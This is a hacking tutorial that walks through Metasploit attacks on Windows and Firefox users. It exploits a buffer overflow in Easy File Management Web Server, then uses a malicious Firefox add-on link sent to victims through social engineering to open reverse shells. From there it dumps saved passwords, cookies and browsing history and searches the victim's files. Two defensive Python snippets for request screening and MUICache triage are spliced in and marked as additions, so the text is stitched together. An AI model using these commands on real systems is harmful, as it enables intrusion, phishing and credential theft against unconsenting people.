Hack Remote Windows PC using Easy File Management Web Server Stack Buffer Overflow

Easy File Management Web Server v4.0 and v5.3 contain a stack buffer overflow condition that is triggered because user-supplied input is not properly validated when handling the UserID cookie. This may allow a remote attacker to execute arbitrary code.
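Because the flaw is reached through the UserID cookie, requests to this server can be screened for abnormal UserID values in front of it. The following is an added example, not part of the original tutorial or of the product; the 64-character limit, the host name and the sample requests are assumptions constructed for illustration.

```python
import re

# Assumption: legitimate UserID values are short printable tokens; tune per deployment.
MAX_USERID_LEN = 64
COOKIE_RE = re.compile(r"(?:^|;\s*)UserID=([^;]*)", re.IGNORECASE)

def parse_headers(raw_request):
    """Return the request headers as a lower-cased name -> value dict."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:          # skip the request line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers

def check_userid_cookie(raw_request):
    """Return a list of findings for the UserID cookie of one HTTP request."""
    cookie = parse_headers(raw_request).get("cookie", "")
    match = COOKIE_RE.search(cookie)
    if not match:
        return []
    value = match.group(1)
    findings = []
    if len(value) > MAX_USERID_LEN:
        findings.append(f"UserID length {len(value)} exceeds {MAX_USERID_LEN}")
    if any(ord(c) < 0x20 or ord(c) > 0x7E for c in value):
        findings.append("UserID contains non-printable bytes")
    return findings

# Constructed sample requests (not captured traffic).
NORMAL = ("GET / HTTP/1.1\r\nHost: files.example\r\n"
          "Cookie: SESSIONID=1; UserID=alice\r\n\r\n")
OVERSIZED = ("GET / HTTP/1.1\r\nHost: files.example\r\n"
             "Cookie: SESSIONID=1; UserID=" + "A" * 500 + "\r\n\r\n")

if __name__ == "__main__":
    for label, request in (("normal", NORMAL), ("oversized", OVERSIZED)):
        print(label, check_userid_cookie(request))
```

The same two conditions translate directly into a reverse-proxy or IDS rule placed in front of the server.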

Exploit Targets
Easy File Management Web Server v5.3

Requirement
Attacker: Kali Linux
Victim PC: Windows 7


Open a Kali terminal and type msfconsole


Now type use exploit/windows/http/efs_fmws_userid_bof
msf exploit (efs_fmws_userid_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (efs_fmws_userid_bof)>set lhost 192.168.1.7 (IP of Local Host)
msf exploit (efs_fmws_userid_bof)>set rhost 192.168.1.2 (IP of Remote Host)
msf exploit (efs_fmws_userid_bof)>exploit


Gather Cookies and History of Mozilla Firefox in Remote Windows, Linux or Mac PC

Open a Kali terminal and type msfconsole


Now type use exploit/multi/browser/firefox_xpi_bootstrapped_addon
msf exploit (firefox_xpi_bootstrapped_addon)>set payload firefox/shell_reverse_tcp
msf exploit (firefox_xpi_bootstrapped_addon)>set lhost 192.168.1.9 (IP of Local Host)
msf exploit (firefox_xpi_bootstrapped_addon)>set uripath /
msf exploit (firefox_xpi_bootstrapped_addon)>exploit  

Now you should give the following URL to your victim: http://192.168.1.9:8080/

Send the link to the server to the victim via chat, email or any social engineering technique. Now you have access to the victim's PC.


Once we have the shell, we simply run the post module to dump the credentials to a file.

How to Gather History

Now type use post/firefox/gather/history
msf exploit (history)>set payload firefox/shell_reverse_tcp
msf exploit (history)>set lhost 192.168.1.9 (IP of Local Host)
msf exploit (history)>set session 1
msf exploit (history)>exploit   


The result will be stored on your local computer:
/root/.msf4/loot/
A look at the result, you will see data like


How to Gather Cookies

Once we have the shell, we simply run the post module to dump the credentials to a file.

Now type use post/firefox/gather/cookies
msf exploit (cookies)>set payload firefox/shell_reverse_tcp
msf exploit (cookies)>set lhost 192.168.1.9 (IP of Local Host)
msf exploit (cookies)>set session 1
msf exploit (cookies)>exploit  


The result will be stored on your local computer:
/root/.msf4/loot/

Hack Saved Password in Mozilla Firefox in Remote Windows, Linux or Mac PC

Open a Kali terminal and type msfconsole



Now type use exploit/multi/browser/firefox_xpi_bootstrapped_addon
msf exploit (firefox_xpi_bootstrapped_addon)>set payload firefox/shell_reverse_tcp
msf exploit (firefox_xpi_bootstrapped_addon)>set lhost 192.168.1.9 (IP of Local Host)
msf exploit (firefox_xpi_bootstrapped_addon)>set uripath /
msf exploit (firefox_xpi_bootstrapped_addon)>exploit  

Now you should give the following URL to your victim: http://192.168.1.9:8080/

Send the link to the server to the victim via chat, email or any social engineering technique. Now you have access to the victim's PC.


Once we have the shell, we simply run the post module to dump the credentials to a file.

Now type use post/firefox/gather/passwords
msf exploit (passwords)>set payload firefox/shell_reverse_tcp
msf exploit (passwords)>set lhost 192.168.1.9 (IP of Local Host)
msf exploit (passwords)>set session 1
msf exploit (passwords)>exploit  

The result will be stored on your local computer:
/root/.msf4/loot/

A look at the result, you will see data like

How to Find ALL Excel, Office, PDF, and Images Files in Remote PC

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Once you have the meterpreter session, use the ‘shell’ command to get a command prompt on the target.

Find ALL MS Excel Files

This command searches the current directory and all subdirectories below it for files that match the given file name.

Type dir *.xls /s


Find ALL MS office Files

This command searches the current directory and all subdirectories below it for files that match the given file name.

Type dir *.doc /s


This command searches the current directory and all subdirectories below it for files that match the given file name.

Type dir *.exe /s


This command searches the current directory and all subdirectories below it for files that match the given file name.

Type dir *.jpg /s


This command searches the current directory and all subdirectories below it for files that match the given file name.

Type dir *.pdf /s

How to Gather MUICache Entries in Remote Windows PC

According to Nirsoft.net, “each time that you start using a new application, Windows operating system automatically extract the application name from the version resource of the exe file, and stores it for using it later, in Registry key known as the ‘MuiCache’.”

This module gathers information about the files and file paths that logged-on users have executed on the system. It will also check whether each file still exists on the system. This information is gathered from the data stored under the MUICache registry key. If the user is logged in when the module is executed, it collects the MUICache entries by accessing the registry directly. If the user is not logged in, the module downloads the user's registry hive (NTUSER.DAT/UsrClass.dat) from the system and the MUICache contents are parsed from the downloaded hive.
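The same artifact is useful in incident response, where MUICache entries show which executables a user has launched and whether they are still on disk. The sketch below is an added example, not the module's code: it parses a text export of the key and flags entries for review. The sample export, the watched directory list and the function names are constructed assumptions, and the export is assumed to be already decoded to text.

```python
import re

# Assumption: executables launched from these user-writable locations are reviewed first.
WATCH_DIRS = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\users\\public\\")
VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')

# Constructed sample of a .reg export of the MuiCache key (not real data).
SAMPLE = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache]
"LangID"=hex:09,04
"C:\\Windows\\system32\\notepad.exe"="Notepad"
"C:\\Users\\demo\\AppData\\Local\\Temp\\setup_tool.exe.FriendlyAppName"="Setup Tool"
"C:\\Users\\demo\\AppData\\Local\\Temp\\setup_tool.exe.ApplicationCompany"="Example Corp"
"@%SystemRoot%\\system32\\shell32.dll,-21769"="Desktop"
'''

def unescape(text):
    """Undo the .reg escaping of backslashes and double quotes."""
    return re.sub(r"\\(.)", r"\1", text)

def parse_muicache(reg_text):
    """Map executable path -> application name from a MuiCache .reg export."""
    entries = {}
    for line in reg_text.splitlines():
        match = VALUE_RE.match(line.strip())
        if not match:
            continue                     # key header, LangID (hex data), blank lines
        name, data = unescape(match.group(1)), unescape(match.group(2))
        if name.startswith("@") or name.endswith(".ApplicationCompany"):
            continue                     # resource strings and vendor names
        if name.endswith(".FriendlyAppName"):
            name = name[: -len(".FriendlyAppName")]
        entries[name] = data
    return entries

def triage(entries, exists):
    """Return (path, reasons) pairs to review; `exists` is a path -> bool callable."""
    findings = []
    for path in sorted(entries):
        reasons = []
        if any(d in path.lower() for d in WATCH_DIRS):
            reasons.append("ran from user-writable directory")
        if not exists(path):
            reasons.append("file no longer present")
        if reasons:
            findings.append((path, reasons))
    return findings
```

On a live Windows host, pass `os.path.exists` as the `exists` argument; for an offline hive, pass a lookup against the file listing of the acquired image.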

Exploit Targets
Windows 7

Requirement
Attacker: Kali Linux
Victim PC: Windows 7

Open a Kali terminal and type msfconsole


Now type use post/windows/gather/enum_muicache
msf exploit (enum_muicache)>set payload windows/meterpreter/reverse_tcp
msf exploit (enum_muicache)>set lhost 192.168.1.3 (IP of Local Host)
msf exploit (enum_muicache)>set session 2
msf exploit (enum_muicache)>exploit




The result will be stored on your local computer:

/root/.msf4/loot/